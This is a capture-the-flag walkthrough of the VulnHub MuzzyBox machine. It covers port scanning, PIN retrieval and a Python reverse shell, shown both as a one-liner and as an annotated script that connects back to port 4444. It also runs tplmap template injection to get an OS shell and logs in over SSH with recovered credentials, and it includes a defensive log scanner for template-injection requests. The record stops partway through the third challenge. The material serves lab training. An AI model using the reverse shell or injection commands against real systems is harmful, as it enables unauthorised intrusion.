VulnHub – MuzzyBox Walkthrough

Scan the host with nmap -A -T4 -p- 192.168.1.12 -vv

We got a few open ports; let's try them one by one and see:

Now we have three challenges, the first on port 3000 and port 9633:

On port 3000 we have a simple upload box to upload a .png file.

And on port 9633 we have an ID card for us to fill in, as the instructions on port 3000 said.

We are going to make it look something like this:

After we upload it we get something similar to this:

We got a PIN: 123456789. Now let's take a look at challenge No. 2 on port 8989:

By clicking on the tiny icon on the far right we get a pop-up box asking for a PIN to unlock it:

Now we use the PIN we got, 123456789:

We get a console where we can upload a Python shell script. We are going to turn this script

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.13",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Into this:

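import socket,subprocess,os
# connect back to the listener
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.1.11",4444))
# point stdin, stdout and stderr at the socket
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
# start an interactive shell on that socket
p=subprocess.call(["/bin/sh","-i"])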

Then we catch the flag in the directory /flag/ ctf2.py: ['FLAG'] = 'N$cTF{R34D_F!L3_/home/webssti/noflag.txt}'

Now for challenge 3, it says:

After system compromise root user is auditing the webserver files and directories by using “bash ls” and “sudo ls” commands. Can you able to get the /root/Final_Flag.txt file using the Out-of-Band technique??

Link: http://{IP}:15000/page?name=muzzy

Now for this specific issue I searched the web, and all roads lead to “Server Side Template Injection”. The most used tool for this is TPLMAP. After we download it, we use it as follows:

First make sure to install the requirements: pip install -r requirements

Then ./tplmap.py -u 'http://192.168.1.12:15000/page?name=hacker' --os-shell
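Seen from the defender's side, template-injection probing of the name parameter leaves template expression syntax in the request URLs of the web server's access log. The following is an added example, not part of the original walkthrough or of the VulnHub machine: it flags requests whose decoded query values contain such syntax. The combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Expression delimiters of common template engines:
# {{ }} and {% %} (Jinja2/Twig), ${ } (Mako/FreeMarker), <% %> (ERB/EJS), #{ } (Ruby/Pug)
TEMPLATE_MARKERS = re.compile(r"\{\{.*?\}\}|\$\{.*?\}|<%.*?%>|\{%.*?%\}|#\{.*?\}", re.S)

# Combined-log-format line: client IP first, request line in double quotes
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return [(param, decoded_value)] for query params holding template syntax."""
    hits = []
    # parse_qsl percent-decodes each value, so encoded delimiters are caught too
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if TEMPLATE_MARKERS.search(value):
            hits.append((key, value))
    return hits

def scan(lines):
    """Return [(client_ip, path, param, value)] for every flagged request."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        path = urlsplit(m.group("target")).path
        for key, value in suspicious_params(m.group("target")):
            findings.append((m.group("ip"), path, key, value))
    return findings

# Constructed sample log lines (not taken from the target machine)
SAMPLE_LOG = [
    '192.168.1.50 - - [01/Jan/2021:10:00:00 +0000] "GET /page?name=muzzy HTTP/1.1" 200 120',
    '192.168.1.13 - - [01/Jan/2021:10:00:05 +0000] "GET /page?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 118',
    '192.168.1.13 - - [01/Jan/2021:10:00:06 +0000] "GET /page?name=$%7B7*7%7D HTTP/1.1" 200 121',
    '192.168.1.13 - - [01/Jan/2021:10:00:07 +0000] "GET /page?name=%3C%25=7*7%25%3E HTTP/1.1" 200 125',
    '192.168.1.50 - - [01/Jan/2021:10:00:09 +0000] "GET /page?name=a%20%7B%20b HTTP/1.1" 200 119',
]

if __name__ == "__main__":
    for ip, path, key, value in scan(SAMPLE_LOG):
        print(f"{ip} {path} {key}={value!r}")
```

A single unbalanced brace, as in the last sample line, is not flagged; only complete expression delimiters are.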

OK, we got in, but we are stuck with a limited shell. A workaround is to use absolute paths to figure out what's inside the directories:

The flag says "ssh nsctf iamnsce", so we SSH to the host using the name nsctf and the password iamnsce:

Now from here in the challenge 3 it says that “After system compromise root user is auditing the webserver files and directories by using “bash ls” and “sudo ls” commands”
